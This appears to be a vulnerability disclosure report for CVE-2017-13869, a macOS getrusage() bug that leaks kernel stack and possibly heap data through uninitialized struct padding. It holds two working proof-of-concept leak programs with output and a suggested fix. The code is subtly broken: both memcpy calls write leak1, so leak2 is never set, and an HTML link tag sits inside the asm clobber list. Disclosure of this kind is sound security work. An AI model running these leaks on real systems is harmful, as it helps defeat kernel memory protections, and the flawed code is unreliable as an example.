MacOS getrusage stack leak through struct padding
CVE-2017-13869
For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:
int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
struct rusage *rup, rubuf;
struct user64_rusage rubuf64;
struct user32_rusage rubuf32;
size_t retsize = sizeof(rubuf); /* default: 32 bits */
caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */
struct timeval utime;
struct timeval stime;
switch (uap->who) {
case RUSAGE_SELF:
calcru(p, &utime, &stime, NULL);
proc_lock(p);
rup = &p->p_stats->p_ru;
rup->ru_utime = utime;
rup->ru_stime = stime;
rubuf = *rup;
proc_unlock(p);
break;
[...]
}
if (IS_64BIT_PROCESS(p)) {
retsize = sizeof(rubuf64);
retbuf = (caddr_t)&rubuf64;
munge_user64_rusage(&rubuf, &rubuf64);
} else {
[...]
}
return (copyout(retbuf, uap->rusage, retsize));
}
`munge_user64_rusage()` performs the conversion by copying individual fields:
__private_extern__ void
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
/* timeval changes size, so utime and stime need special handling */
a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}
`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:
#define _STRUCT_USER64_TIMEVAL struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
user64_time_t tv_sec; /* seconds */
__int32_t tv_usec; /* and microseconds */
};
struct user64_rusage {
struct user64_timeval ru_utime; /* user time used */
struct user64_timeval ru_stime; /* system time used */
user64_long_t ru_maxrss; /* max resident set size */
[...]
};
This padding is not initialized, but is copied to userspace.
The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.
Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.
The returned data seems to come from the previous syscall:
$ cat test.c
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
void do_leak(void) {
static struct rusage ru;
getrusage(RUSAGE_SELF, &ru);
static unsigned int leak1, leak2;
memcpy(&leak1, ((char*)&ru)+12, 4);
memcpy(&leak1, ((char*)&ru)+28, 4);
printf("leak1: 0x%08x\n", leak1);
printf("leak2: 0x%08x\n", leak2);
}
int main(void) {
do_leak();
do_leak();
do_leak();
int fd = open("/dev/null", O_RDONLY);
do_leak();
int dummy;
read(fd, &dummy, 4);
do_leak();
return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000
However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:
$ cat forktest.c
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
void do_leak(void) {
static struct rusage ru;
getrusage(RUSAGE_SELF, &ru);
static unsigned int leak1, leak2;
memcpy(&leak1, ((char*)&ru)+12, 4);
memcpy(&leak1, ((char*)&ru)+28, 4);
char str[1000];
if (leak1 != 0) {
sprintf(str, "leak1: 0x%08x\n", leak1);
write(1, str, strlen(str));
}
if (leak2 != 0) {
sprintf(str, "leak2: 0x%08x\n", leak2);
write(1, str, strlen(str));
}
}
void leak_in_child(void) {
int res_pid, res2;
asm volatile(
"mov $0x02000002, %%rax\n\t"
"syscall\n\t"
: "=a"(res_pid), "=d"(res2)
:
: "cc", "memory", "rcx", "<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>"
);
//write(1, "postfork\n", 9);
if (res2 == 1) {
//write(1, "child\n", 6);
do_leak();
char dummy;
read(0, &dummy, 1);
asm volatile(
"mov $0x02000001, %rax\n\t"
"mov $0, %rdi\n\t"
"syscall\n\t"
);
}
//printf("fork=%d:%d\n", res_pid, res2);
int wait_res;
//wait(&wait_res);
}
int main(void) {
for(int i=0; i<1000; i++) {
leak_in_child();
}
}
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b
The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.
Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: jannh